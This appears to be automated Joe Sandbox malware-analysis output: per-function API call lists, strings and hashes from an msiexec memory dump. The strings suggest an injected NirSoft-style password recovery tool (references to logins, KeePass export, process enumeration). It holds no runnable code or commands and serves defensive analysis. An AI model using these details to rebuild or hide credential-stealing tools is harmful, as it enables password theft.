                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: ByteCharMultiWide$memset$_mbscpy$_wcsicmp$CloseFileHandleSize_wtoi_wtoi64wcscpy
                                                                                              • String ID: logins$null
                                                                                              • API String ID: 2148543256-2163367763
                                                                                              • Opcode ID: 09a376002f14fa1f9e0d48ac719059c44ef41498ede045729c177772a5669da3
                                                                                              • Instruction ID: fdf7b148d119976dec4a4ca0125bd44813aaa3c4ab878784613783167982a03f
                                                                                              • Opcode Fuzzy Hash: 09a376002f14fa1f9e0d48ac719059c44ef41498ede045729c177772a5669da3
                                                                                              • Instruction Fuzzy Hash: 48713371904219AEEF10BBA2DD82DDF767DEF00318F10457FB508B61C2DA785E458BA9
                                                                                              APIs
                                                                                                • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                              • GetFileSize.KERNEL32(00000000,00000000,?,00000001,00000000,?,004089ED,?,?,?,0000001E,?,?,00000104), ref: 00408589
                                                                                              • ??2@YAPAXI@Z.MSVCRT(00000001,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 0040859D
                                                                                                • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                              • memset.MSVCRT ref: 004085CF
                                                                                              • memset.MSVCRT ref: 004085F1
                                                                                              • memset.MSVCRT ref: 00408606
                                                                                              • strcmp.MSVCRT ref: 00408645
                                                                                              • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086DB
                                                                                              • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086FA
                                                                                              • memset.MSVCRT ref: 0040870E
                                                                                              • strcmp.MSVCRT ref: 0040876B
                                                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000001E), ref: 0040879D
                                                                                              • CloseHandle.KERNEL32(?,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 004087A6
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: memset$File$_mbscpystrcmp$??2@??3@CloseCreateHandleReadSize
                                                                                              • String ID: ---
                                                                                              • API String ID: 3437578500-2854292027
                                                                                              • Opcode ID: 86eb99c19707b425fb2b039d8f5ba7922df37cc2677e68e6646184786069dd0e
                                                                                              • Instruction ID: 4c5fbc017ddd4a43d5b0f69e9578b2b0908928dff5e121bfcb53d45818d158f6
                                                                                              • Opcode Fuzzy Hash: 86eb99c19707b425fb2b039d8f5ba7922df37cc2677e68e6646184786069dd0e
                                                                                              • Instruction Fuzzy Hash: 256191B2C0421DAADF20DB948D819DEBBBCAB15314F1140FFE558B3141DA399BC4CBA9
                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 0041087D
                                                                                              • memset.MSVCRT ref: 00410892
                                                                                              • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                                              • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                                              • SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                                              • SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                                              • LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                                              • LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                                              • GetSysColor.USER32(0000000F), ref: 00410999
                                                                                              • DeleteObject.GDI32(?), ref: 004109D0
                                                                                              • DeleteObject.GDI32(?), ref: 004109D6
                                                                                              • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 004109F3
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$DeleteHandleImageLoadModuleObjectmemset$ColorDirectoryFileInfoWindows
                                                                                              • String ID:
                                                                                              • API String ID: 1010922700-0
                                                                                              • Opcode ID: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                                                                                              • Instruction ID: e9b684d61d60cc1afb152275eb3c8de820581b68aaecd99ee02cab8be193ddee
                                                                                              • Opcode Fuzzy Hash: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                                                                                              • Instruction Fuzzy Hash: 48418575640304BFF720AF61DC8AF97779CFB09744F000829F399A51E1D6F6A8909B29
                                                                                              APIs
                                                                                                • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                              • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                                              • malloc.MSVCRT ref: 004186B7
                                                                                              • free.MSVCRT ref: 004186C7
                                                                                              • GetFullPathNameW.KERNEL32(00000000,-00000003,00000000,00000000), ref: 004186DB
                                                                                              • free.MSVCRT ref: 004186E0
                                                                                              • GetFullPathNameA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186F6
                                                                                              • malloc.MSVCRT ref: 004186FE
                                                                                              • GetFullPathNameA.KERNEL32(00000000,-00000003,00000000,00000000), ref: 00418711
                                                                                              • free.MSVCRT ref: 00418716
                                                                                              • free.MSVCRT ref: 0041872A
                                                                                              • free.MSVCRT ref: 00418749
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: free$FullNamePath$malloc$Version
                                                                                              • String ID: |A
                                                                                              • API String ID: 3356672799-1717621600
                                                                                              • Opcode ID: 66b970c2726a19c6cf161dcebd973c19408ec610aa0d83d05880a80435803f02
                                                                                              • Instruction ID: f8a1ad7f3386c3a0ca67e8408a701755caa4d882ef8d2f884b3bc60851bd4b4d
                                                                                              • Opcode Fuzzy Hash: 66b970c2726a19c6cf161dcebd973c19408ec610aa0d83d05880a80435803f02
                                                                                              • Instruction Fuzzy Hash: F5217432900118BFEF11BFA6DC46CDFBB79DF41368B22006FF804A2161DA799E91995D
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcsicmp
                                                                                              • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                                                                              • API String ID: 2081463915-1959339147
                                                                                              • Opcode ID: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                                                                                              • Instruction ID: 8733bd8b557f913067c5021fbfe18d0583d9fd94efe92a6f612d034962822ca0
                                                                                              • Opcode Fuzzy Hash: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                                                                                              • Instruction Fuzzy Hash: A401843328931228FA2538663D07F834F48CB52BBBF32405BF800D81C6FE8C4565605E
                                                                                              APIs
                                                                                                • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                              • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004138ED
                                                                                              • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004138FE
                                                                                              • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 0041390F
                                                                                              • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00413920
                                                                                              • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 00413931
                                                                                              • FreeLibrary.KERNEL32(00000000), ref: 00413951
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                                                              • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                              • API String ID: 2012295524-70141382
                                                                                              • Opcode ID: de34bece31b7142a998ab6ccb1b4abbedb6e98f3c738f5240e3b00242a7e4309
                                                                                              • Instruction ID: 1ed0e205fb1d3ca6b4a3c81c58fecbd4dea9624ac3f9f6029147382c5f000437
                                                                                              • Opcode Fuzzy Hash: de34bece31b7142a998ab6ccb1b4abbedb6e98f3c738f5240e3b00242a7e4309
                                                                                              • Instruction Fuzzy Hash: 7301B5B1905312DAD7705F31AE40B6B2FA45B81FA7B10003BEA00D1286DBFCC8C5DA6E
                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,?,0041339D), ref: 0041384C
                                                                                              • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00413865
                                                                                              • GetProcAddress.KERNEL32(00000000,Module32First), ref: 00413876
                                                                                              • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00413887
                                                                                              • GetProcAddress.KERNEL32(00000000,Process32First), ref: 00413898
                                                                                              • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 004138A9
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressProc$HandleModule
                                                                                              • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                                                                              • API String ID: 667068680-3953557276
                                                                                              • Opcode ID: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                                                              • Instruction ID: ced2a49a11d8a5ad7e856d80fa96ce31c371be68fc2c17877008b9264e9f9212
                                                                                              • Opcode Fuzzy Hash: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                                                              • Instruction Fuzzy Hash: 58F08631900317A9E7206F357D41B672AE45B86F83714017BFC04D12D9DB7CE98A9B6D
                                                                                              APIs
                                                                                              • GetDC.USER32(00000000), ref: 004121FF
                                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041220A
                                                                                              • ReleaseDC.USER32(00000000,00000000), ref: 0041221F
                                                                                              • SetBkMode.GDI32(?,00000001), ref: 00412232
                                                                                              • SetTextColor.GDI32(?,00FF0000), ref: 00412240
                                                                                              • SelectObject.GDI32(?,?), ref: 00412251
                                                                                              • DrawTextExW.USER32(?,?,000000FF,?,00000024,?), ref: 00412285
                                                                                              • SelectObject.GDI32(00000014,00000005), ref: 00412291
                                                                                                • Part of subcall function 00411FC6: GetCursorPos.USER32(?), ref: 00411FD0
                                                                                                • Part of subcall function 00411FC6: GetSubMenu.USER32(?,00000000), ref: 00411FDE
                                                                                                • Part of subcall function 00411FC6: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0041200F
                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 004122AC
                                                                                              • LoadCursorW.USER32(00000000,00000067), ref: 004122B5
                                                                                              • SetCursor.USER32(00000000), ref: 004122BC
                                                                                              • PostMessageW.USER32(?,00000428,00000000,00000000), ref: 00412304
                                                                                              • memcpy.MSVCRT(?,?,00002008), ref: 0041234D
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: Cursor$MenuObjectSelectText$CapsColorDeviceDrawHandleLoadMessageModeModulePopupPostReleaseTrackmemcpy
                                                                                              • String ID:
                                                                                              • API String ID: 1700100422-0
                                                                                              • Opcode ID: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                                                                              • Instruction ID: eb413d4c014922f01c1be241ee45634b3e5b5e29cfe5fc1015c733cb557b7a75
                                                                                              • Opcode Fuzzy Hash: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                                                                              • Instruction Fuzzy Hash: 0F61D331600109AFDB149F74CE89BEA77A5BB45300F10052AFA25D7291DBBC9CB1DB59
                                                                                              APIs
                                                                                              • GetClientRect.USER32(?,?), ref: 004111E0
                                                                                              • GetWindowRect.USER32(?,?), ref: 004111F6
                                                                                              • GetWindowRect.USER32(?,?), ref: 0041120C
                                                                                              • GetDlgItem.USER32(00000000,0000040D), ref: 00411246
                                                                                              • GetWindowRect.USER32(00000000), ref: 0041124D
                                                                                              • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0041125D
                                                                                              • BeginDeferWindowPos.USER32(00000004), ref: 00411281
                                                                                              • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 004112A4
                                                                                              • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 004112C3
                                                                                              • DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 004112EE
                                                                                              • DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 00411306
                                                                                              • EndDeferWindowPos.USER32(?), ref: 0041130B
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$Defer$Rect$BeginClientItemPoints
                                                                                              • String ID:
                                                                                              • API String ID: 552707033-0
                                                                                              • Opcode ID: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                                              • Instruction ID: 1a89c9de14f4e003cb1acc22e2fe5cfe68aec74c13575a54a2aa846d798aa5ff
                                                                                              • Opcode Fuzzy Hash: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                                              • Instruction Fuzzy Hash: 3B41D375900209FFEB11DFA8DD89FEEBBBAFB48300F104469F655A61A0C771AA50DB14
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: memset$_snwprintf
                                                                                              • String ID: %%0.%df
                                                                                              • API String ID: 3473751417-763548558
                                                                                              • Opcode ID: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                                                                                              • Instruction ID: e3e507119e413e1699737691dcc770ce903c50d69a4f0c7cc4f670013a5326e5
                                                                                              • Opcode Fuzzy Hash: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                                                                                              • Instruction Fuzzy Hash: 2D318F71800129BBEB20DF95CC85FEB77BCFF49304F0104EAB509A2155E7349A94CBA9
                                                                                              APIs
                                                                                              • SetTimer.USER32(?,00000041,00000064,00000000), ref: 004060C7
                                                                                              • KillTimer.USER32(?,00000041), ref: 004060D7
                                                                                              • KillTimer.USER32(?,00000041), ref: 004060E8
                                                                                              • GetTickCount.KERNEL32 ref: 0040610B
                                                                                              • GetParent.USER32(?), ref: 00406136
                                                                                              • SendMessageW.USER32(00000000), ref: 0040613D
                                                                                              • BeginDeferWindowPos.USER32(00000004), ref: 0040614B
                                                                                              • EndDeferWindowPos.USER32(00000000), ref: 0040619B
                                                                                              • InvalidateRect.USER32(?,?,00000001), ref: 004061A7
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
                                                                                              • String ID: A
                                                                                              • API String ID: 2892645895-3554254475
                                                                                              • Opcode ID: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                                                              • Instruction ID: 3d646c34c65c30a23a549f03b0efc12359fcfb722ff8df3f2fd47db5f06942f8
                                                                                              • Opcode Fuzzy Hash: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                                                              • Instruction Fuzzy Hash: 67318F75240304BBEB205F62DC85F6A7B6ABB44742F018539F3067A5E1C7F998A18B58
                                                                                              APIs
                                                                                              • LoadMenuW.USER32(?,?), ref: 0040D97F
                                                                                                • Part of subcall function 0040D7A7: GetMenuItemCount.USER32(?), ref: 0040D7BD
                                                                                                • Part of subcall function 0040D7A7: memset.MSVCRT ref: 0040D7DC
                                                                                                • Part of subcall function 0040D7A7: GetMenuItemInfoW.USER32 ref: 0040D818
                                                                                                • Part of subcall function 0040D7A7: wcschr.MSVCRT ref: 0040D830
                                                                                              • DestroyMenu.USER32(00000000), ref: 0040D99D
                                                                                              • CreateDialogParamW.USER32(?,?,00000000,0040D952,00000000), ref: 0040D9F2
                                                                                              • GetDesktopWindow.USER32 ref: 0040D9FD
                                                                                              • CreateDialogParamW.USER32(?,?,00000000), ref: 0040DA0A
                                                                                              • memset.MSVCRT ref: 0040DA23
                                                                                              • GetWindowTextW.USER32(00000005,?,00001000), ref: 0040DA3A
                                                                                              • EnumChildWindows.USER32(00000005,Function_0000D898,00000000), ref: 0040DA67
                                                                                              • DestroyWindow.USER32(00000005), ref: 0040DA70
                                                                                                • Part of subcall function 0040D5D6: _snwprintf.MSVCRT ref: 0040D5FB
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
                                                                                              • String ID: caption
                                                                                              • API String ID: 973020956-4135340389
                                                                                              • Opcode ID: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
                                                                                              • Instruction ID: d77e6bedd7727d4aace6f5c0bd160524984489d6dc7b24eaa8e7ecc9459ec1fc
                                                                                              • Opcode Fuzzy Hash: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
                                                                                              • Instruction Fuzzy Hash: 60319072900208BFEF11AF91DC85EAA3B78FF04315F10843AF909A61A1D7799D58CF59
                                                                                              APIs
                                                                                              Strings
                                                                                              • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00410A70
                                                                                              • <table dir="rtl"><tr><td>, xrefs: 00410B00
                                                                                              • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00410B3C
                                                                                              • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00410ADD
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: memset$_snwprintf$wcscpy
                                                                                              • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                                                                                              • API String ID: 1283228442-2366825230
                                                                                              • Opcode ID: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
                                                                                              • Instruction ID: da896b014e5ee892582fb8e7d48e4383de9842bc572d8210300f5843ce7472f7
                                                                                              • Opcode Fuzzy Hash: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
                                                                                              • Instruction Fuzzy Hash: 5C2182B69002197BDB21AB95CC41EDE77BCAF08785F0040ABF549D3151DA789F888BA9
                                                                                              APIs
                                                                                              • wcschr.MSVCRT ref: 00413972
                                                                                              • wcscpy.MSVCRT ref: 00413982
                                                                                                • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                                                                • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                                                                • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                                                              • wcscpy.MSVCRT ref: 004139D1
                                                                                              • wcscat.MSVCRT ref: 004139DC
                                                                                              • memset.MSVCRT ref: 004139B8
                                                                                                • Part of subcall function 00409DD5: GetWindowsDirectoryW.KERNEL32(0045DC58,00000104,?,00413A11,?,?,00000000,00000208,?), ref: 00409DEB
                                                                                                • Part of subcall function 00409DD5: wcscpy.MSVCRT ref: 00409DFB
                                                                                              • memset.MSVCRT ref: 00413A00
                                                                                              • memcpy.MSVCRT(?,?,00000004,?,?,00000000,00000208,?), ref: 00413A1B
                                                                                              • wcscat.MSVCRT ref: 00413A27
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
                                                                                              • String ID: \systemroot
                                                                                              • API String ID: 4173585201-1821301763
                                                                                              • Opcode ID: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
                                                                                              • Instruction ID: a9582ad2fab6187976d7b5f1d827ce349b207672d34ede1993470c6c3fb504e1
                                                                                              • Opcode Fuzzy Hash: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
                                                                                              • Instruction Fuzzy Hash: 7D21F6F68053146AE720FB619C86EEF73EC9F06719F20415FF115A20C6EA7C9A844B5E
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: wcscpy
                                                                                              • String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
                                                                                              • API String ID: 1284135714-318151290
                                                                                              • Opcode ID: dc6868dd8f5dbcd850853512a46c22a4be17f2be4da4ff30984607c28efcaa9d
                                                                                              • Instruction ID: e2253d4fd864bfabc2f945990654e2d0feb0e3e4f5de9ed447e77a37a808a444
                                                                                              • Opcode Fuzzy Hash: dc6868dd8f5dbcd850853512a46c22a4be17f2be4da4ff30984607c28efcaa9d
                                                                                              • Instruction Fuzzy Hash: 04F0127526EA4161142406240E0DEF75509D0D575F3F74A537A02E89D6FCCDDEC6609F
                                                                                              APIs
                                                                                                • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                                                              • GetFileSize.KERNEL32(00000000,00000000), ref: 0040C0D4
                                                                                                • Part of subcall function 0040BFF3: _memicmp.MSVCRT ref: 0040C00D
                                                                                                • Part of subcall function 0040BFF3: memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024
                                                                                              • memcpy.MSVCRT(00000000,?,00000004,00000000,?,?,?,?), ref: 0040C11B
                                                                                              • strchr.MSVCRT ref: 0040C140
                                                                                              • strchr.MSVCRT ref: 0040C151
                                                                                              • _strlwr.MSVCRT ref: 0040C15F
                                                                                              • memset.MSVCRT ref: 0040C17A
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0040C1C7
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: Filememcpystrchr$CloseHandlePointerSize_memicmp_strlwrmemset
                                                                                              • String ID: 4$h
                                                                                              • API String ID: 4019544885-1856150674
                                                                                              • Opcode ID: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                                                                              • Instruction ID: ad7b68c589633d756b108d453181f98220e50dbf4ed18f1a1dc8c2c6e1bbf79d
                                                                                              • Opcode Fuzzy Hash: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                                                                              • Instruction Fuzzy Hash: F531C2B2800218FEEB20EB54CC85EEE73BCEF05354F14416AF508A6181D7389F558FA9
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
                                                                                              • String ID: 0$6
                                                                                              • API String ID: 4066108131-3849865405
                                                                                              • Opcode ID: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                                                                                              • Instruction ID: 23fd2219eb4cf2a86962fa47610fb6a66e7712bfbd77636794901fa2ff6d3352
                                                                                              • Opcode Fuzzy Hash: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                                                                                              • Instruction Fuzzy Hash: 1C317C72808344AFDB209F95D84499FB7E8FF84314F00493EFA48A2291D775D949CB5B
                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 004082EF
                                                                                                • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                              • memset.MSVCRT ref: 00408362
                                                                                              • memset.MSVCRT ref: 00408377
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: memset$ByteCharMultiWide
                                                                                              • String ID:
                                                                                              • API String ID: 290601579-0
                                                                                              • Opcode ID: 0f4830a1bd5c139c57c95e775b3a7e0dd93a0ba2de61a1ec6096e44496360a03
                                                                                              • Instruction ID: eff1c4cb9ad8ed09cf65616da307521f953f8cb6273bc8e87bbfe44e88666a06
                                                                                              • Opcode Fuzzy Hash: 0f4830a1bd5c139c57c95e775b3a7e0dd93a0ba2de61a1ec6096e44496360a03
                                                                                              • Instruction Fuzzy Hash: E1716C72E0421DAFEF10EFA1EC82AEDB7B9EF04314F14406FE104B6191EB795A458B59
                                                                                              APIs
